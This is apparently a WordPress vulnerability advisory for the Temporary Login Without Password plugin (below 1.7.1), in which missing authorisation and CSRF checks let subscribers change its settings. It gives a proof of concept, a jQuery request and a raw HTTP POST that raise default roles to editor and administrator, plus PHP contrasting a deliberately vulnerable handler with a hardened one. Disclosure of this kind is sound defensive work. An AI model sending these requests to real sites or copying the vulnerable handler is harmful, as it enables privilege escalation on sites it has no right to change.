WordPress Plugin Vulnerabilities
Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update
Description
The plugin does not perform authorisation or CSRF checks when updating its settings, which could allow any logged-in user, such as a subscriber, to update them.
Proof of Concept
jQuery.post("https://example.com/wp-admin/index.php", {
  "wtlwp-nonce": "foo", // Not validated
  tlwp_settings_data: {
    default_role: "editor",
    default_expiry_time: "month_after_access",
    visible_roles: ["editor", "administrator"],
    default_redirect_to: "wp_dashboard"
  }
})

POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]

wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard
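As an added example (not the plugin's own code), the shape of a settings handler with the two missing checks the description names, beside a hardened version that adds the capability check, nonce verification and input whitelisting. The field names come from the PoC above; the option name, action string and the tlwp_demo_ function names are assumptions.

```php
<?php
// Added example, not the plugin's own code: a hypothetical settings handler in the
// vulnerable shape the advisory describes, beside a hardened version.
// Field names come from the PoC; the option name, action string and text domain
// ('tlwp_demo_*') are assumptions. Requires WordPress core functions.

// Vulnerable shape: any logged-in user reaches this, and the nonce is never verified.
function tlwp_demo_save_settings_vulnerable() {
    if ( empty( $_POST['tlwp_settings_data'] ) ) {
        return;
    }
    update_option( 'tlwp_demo_settings', wp_unslash( $_POST['tlwp_settings_data'] ) );
}

// Hardened shape: capability check, nonce verification, then strict sanitisation.
function tlwp_demo_save_settings_hardened() {
    if ( empty( $_POST['tlwp_settings_data'] ) ) {
        return;
    }
    // Authorisation: only users allowed to manage options (administrators by default).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.', 'tlwp_demo' ), 403 );
    }
    // CSRF: the request must carry a nonce created for this action via wp_create_nonce().
    $nonce = isset( $_POST['wtlwp-nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['wtlwp-nonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'tlwp_demo_save_settings' ) ) {
        wp_die( esc_html__( 'Invalid or expired request token.', 'tlwp_demo' ), 403 );
    }
    $raw   = (array) wp_unslash( $_POST['tlwp_settings_data'] );
    $roles = array_keys( wp_roles()->get_names() ); // roles that actually exist on this site
    $clean = array(
        // Never store a default role that does not exist on the site.
        'default_role'        => in_array( $raw['default_role'] ?? '', $roles, true )
                                    ? $raw['default_role'] : 'subscriber',
        // Keep only real role slugs; anything else submitted is dropped.
        'visible_roles'       => array_values( array_intersect( (array) ( $raw['visible_roles'] ?? array() ), $roles ) ),
        // The plugin's real allowed values are not on the page; restrict to a safe key format.
        'default_expiry_time' => sanitize_key( $raw['default_expiry_time'] ?? '' ),
        'default_redirect_to' => sanitize_key( $raw['default_redirect_to'] ?? '' ),
    );
    update_option( 'tlwp_demo_settings', $clean );
}

// Hook the hardened handler to a dedicated admin-post action (hypothetical action name).
add_action( 'admin_post_tlwp_demo_save_settings', 'tlwp_demo_save_settings_hardened' );
```

A settings form that posts to this handler must embed the matching nonce with wp_nonce_field( 'tlwp_demo_save_settings', 'wtlwp-nonce' ), otherwise legitimate saves are rejected along with forged ones.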
Classification
Type
INCORRECT AUTHORISATION
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-11-15
Added
2021-11-15
Last Updated
2022-04-09